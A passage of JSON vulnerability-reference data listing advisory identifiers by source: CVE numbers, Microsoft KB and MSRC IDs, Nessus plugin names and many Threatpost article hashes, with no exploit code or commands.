"MMPC:A086D121065A6253A8EECABD51EB16DF", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F36351D1B5A5C40989F46EF8729039A7", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2017-8570", "MS:CVE-2018-0802", "MS:CVE-2018-8174", "MS:CVE-2020-1472", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-31207", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB2553204", "KB2664258", "KB2814124", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB3213545", "KB3213555", "KB3213624", "KB3213640", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659", "KB4013389", "KB4014793", "KB4103712", "KB4103715", "KB4103726", "KB4134651", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5001779", "KB5003435"]}, {"type": "msrc", "idList": ["MSRC:11EE27B79C8FC8176F733C5748E02C96", "MSRC:35A18F0B9DCC4126DC5EC19296034C33", "MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "MSRC:617BB0BF7CDA5777BFA2E81C8277D73C", "MSRC:6EA997A78BB548DC0178952394874CE2", "MSRC:8F98074A1D86F9B965ADC16597E286ED", 
"MSRC:93A361B73FFA3EEFB6825C56F25103BB", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "MSRC:C6213215CC0BE4847F142F730607AFA2", "MSRC:D7503EE6392B6B3DC42482FC0340DB67", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:A086D121065A6253A8EECABD51EB16DF", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201454156", "MYHACK58:62201454165", "MYHACK58:62201681759", "MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786371", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201890088", "MYHACK58:62201891024", "MYHACK58:62201891130", "MYHACK58:62201891201", "MYHACK58:62201891947", "MYHACK58:62201891962", "MYHACK58:62201892253", 
"MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994507", "MYHACK58:62201994516", "MYHACK58:62201994562", "MYHACK58:62201994593", "MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1585.NASL", "AL2_ALAS-2021-1649.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1739.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2012-88.NASL", "ALA_ALAS-2014-418.NASL", "ALA_ALAS-2014-419.NASL", "ALA_ALAS-2021-1469.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "BASH_CVE_2014_6271_RCE.NASL", "BASH_CVE_2014_6278.NASL", "BASH_REMOTE_CODE_EXECUTION.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2012-0135.NASL", "CENTOS_RHSA-2012-0729.NASL", "CENTOS_RHSA-2012-0730.NASL", "CENTOS_RHSA-2012-1009.NASL", "CENTOS_RHSA-2014-1293.NASL", "CENTOS_RHSA-2014-1306.NASL", "CENTOS_RHSA-2020-5439.NASL", "CHECK_POINT_GAIA_SK102673.NASL", "CISCO-SA-20140926-BASH-NXOS.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CISCO-SA-CSCUR01959-ASA-CX.NASL", "CISCO-SA-CSCUR01959-PRSM.NASL", "CISCO_CUPS_CSCUR05454.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "CITRIX_NETSCALER_CTX267027.NASL", 
"THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:1842F12350B277A2FE1B6F4AF2F1BFDB", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B29120EF1DBE107B55050178910AACD", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1C58BC6383AE29EEEDCF326556EF6630", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1DED483898A12D8F4397D8C01339AC63", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:2154D4513B1B000120D100B6FE1F0D83", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", 
"THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", 
"THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3DAB2A56F377207FBFA093C4AC3D52BD", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3E82813FD33FCC5937E06B9D667A547A", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3F2E82624DED93EDD273ABC41E24154C", "THREATPOST:3F7782E542B792C04AE754958BA472C7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "THREATPOST:4092394DCBD8AD236C5B4A45CBC114AB", 
"THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:427F2EA5BAE6D1C835F7B049DD5D6D27", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:440B0C9A3453F28AD6AABD6CD97AA074", "THREATPOST:4474B9334E9322D775C57232CC4127EF", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", 
"THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:4F07A726C1A5FB6D0CE8EDF605517CA0", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:526344AB4FCAD9AE4506103DF1F88157", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:551363592C0C853E266999644B3579E4", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", 
"THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5A8F52C1AE647553C21FA300983F3770", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:616CAD98C622760276F2D4E79A091E01", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61D681852E79564E99078768957CB417", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:635801BB456AF20B4CCF183C2BD94E5A", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", 
"THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C4662EB2B72616C90A201601B18E392", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E1A424ADE6EAAA732FBE0027DD6F97F", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:75D7888FBC8994FA98D2CC1C4AB75EAF", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:7719EB430C620858B2504EA847A9A096", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", 
"THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:794EAB73A376A35B810DFA241137B6D2", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7B46C96564251E67650F604C0B32BC46", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:849E78B2F5C0D699337829FD6D6F8AE4", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", 
"THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:862191C4B9FAB2D3FF3980991801A529", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:86859A3C9EC793C6A0592ED93308A9DD", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:87BEB3651A26414841F6C10CC8797A19", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", 